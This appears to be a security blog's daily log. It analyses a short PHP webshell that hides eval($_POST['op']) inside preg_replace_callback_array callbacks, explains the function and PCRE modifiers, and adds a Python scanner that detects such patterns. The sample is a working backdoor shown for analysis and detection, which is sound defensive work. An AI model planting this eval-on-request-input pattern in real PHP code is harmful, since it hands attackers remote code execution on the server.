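Summary
Daily log. I've been sick recently, so there is just one sample.
This post covers the analysis of a PHP trojan, the function preg_replace_callback_array, and notes on PHP regex pattern modifiers.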
Sample1
<?php
$subject = 'little hann';
preg_replace_callback_array(
    [
        '~[t]+~i' => function ($match) {
            eval($_POST['op']);
        },
        '~[n]+~i' => function ($match) {
            eval($_POST['op']);
        }
    ],
    $subject
);
?>
Analysis
Function: preg_replace_callback_array
An example showing its usage:
<?php
$subject = 'Aaaaaa Bbb';
preg_replace_callback_array(
    [
        '~[a]+~i' => function ($match) {
            echo strlen($match[0]), ' matches for "a" found', PHP_EOL;
        },
        '~[b]+~i' => function ($match) {
            echo strlen($match[0]), ' matches for "b" found', PHP_EOL;
        }
    ],
    $subject
);
?>
THE OUTPUT IS
6 matches for "a" found
3 matches for "b" found
IN THE TROJAN
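In the trojan, the patterns match any run of the letter 't' or 'n' in the subject string. The subject 'little hann' contains both, so the callbacks always run, and each one passes the POST parameter 'op' to eval(). The attacker posts the command through the parameter 'op' to achieve RCE.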
Need to remember: PHP PCRE Pattern Modifiers
http://php.net/manual/en/reference.pcre.pattern.modifiers.php
- i: letters in the pattern match both upper and lower case letters
- m(MULTILINE): "^" and "$" also match immediately following or immediately before any newline in the subject string
- s(DOTALL): a dot metacharacter in the pattern matches all characters, including newlines
- x(EXTENDED): whitespace data characters in the pattern are totally ignored except when escaped or inside a character class, and characters between an unescaped
- e(REPLACE_EVAL): does normal substitution of backreferences in the replacement string, evaluates it as PHP code, and uses the result for replacing the search string
  Pay attention to this one: it is unsafe. This feature was DEPRECATED in PHP 5.5.0, and REMOVED as of PHP 7.0.0.
- A: the pattern is constrained to match only at the start of the string which is being searched (the "subject string") [I can't understand it; maybe I can understand it after an experiment]
- D(DOLLAR_ENDONLY): a dollar metacharacter in the pattern matches only at the end of the subject string
- S: performs extra analysis of a pattern that will be reused, to speed up matching
- U(UNGREEDY): inverts the “greediness” of the quantifiers so that they are not greedy by default, but become greedy if followed by ?.
- X: Any backslash in a pattern that is followed by a letter that has no special meaning causes an error
- J: changes the local PCRE_DUPNAMES option to allow duplicate names for subpatterns
- u(UTF8): pattern and subject strings are treated as UTF-8
- frequently used, maybe: i, m, s, x
- don't use: e
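A defender-side check for the two things discussed above, the eval-in-callback trojan and the e modifier, as an added example that is not part of the original post: a heuristic Python scanner for PHP source. The sink and source lists, the rule names and the LEGACY_E line are assumptions made for illustration.

```python
import re

# Heuristic rules; the sink and source lists are assumptions, extend as needed.
SINKS = r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)"
SOURCES = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"
SINK_ON_INPUT = re.compile(SINKS + r"\s*\([^;]*?" + SOURCES, re.I)
CALLBACK_CALL = re.compile(r"\bpreg_replace_callback(?:_array)?\s*\(", re.I)
PREG_LITERAL = re.compile(  # preg_replace('<d>...<d><modifiers>', ...), one-char delimiter
    r"""\bpreg_replace\s*\(\s*(['"])([^\w\s\\])(?:\\.|(?!\1).)*\2([A-Za-z]*)\1""",
    re.I | re.S)
STRING = re.compile(r"'(?:\\.|[^'\\])*'" + "|" + r'"(?:\\.|[^"\\])*"', re.S)

def call_end(masked, open_idx):
    """Index just past the ')' that closes the '(' at open_idx."""
    depth = 0
    for i in range(open_idx, len(masked)):
        depth += {"(": 1, ")": -1}.get(masked[i], 0)
        if depth == 0:
            return i + 1
    return len(masked)

def scan(src):
    """Return sorted (line, rule) findings for one PHP source string."""
    line_of = lambda pos: src.count("\n", 0, pos) + 1
    findings = []
    # Rule 1: pattern literal carrying the e (REPLACE_EVAL) modifier.
    for m in PREG_LITERAL.finditer(src):
        if "e" in m.group(3):
            findings.append((line_of(m.start()), "preg-e-modifier"))
    # Rule 2: a preg callback body that passes request input to an exec sink.
    masked = STRING.sub(lambda s: "_" * len(s.group()), src)  # blank strings, keep offsets
    for m in CALLBACK_CALL.finditer(masked):
        start = m.end() - 1
        for hit in SINK_ON_INPUT.finditer(masked, start, call_end(masked, start)):
            findings.append((line_of(hit.start()), "callback-exec-of-input"))
    return sorted(findings)

# Sample1 from the page, reflowed onto fewer lines.
PAGE_SAMPLE1 = r"""<?php
$subject = 'little hann';
preg_replace_callback_array([
  '~[t]+~i' => function ($match) { eval($_POST['op']); },
  '~[n]+~i' => function ($match) { eval($_POST['op']); }
], $subject);
"""
# Constructed legacy line using the removed e modifier.
LEGACY_E = r"""<?php echo preg_replace('/(\w+)/e', 'strtoupper("$1")', $text);"""

if __name__ == "__main__":
    print(scan(PAGE_SAMPLE1), scan(LEGACY_E))
```

The scanner works on text, not on PHP tokens, so quotes inside comments or bracket-style delimiters such as `{...}` can cause misses or false positives; treat hits as leads for manual review.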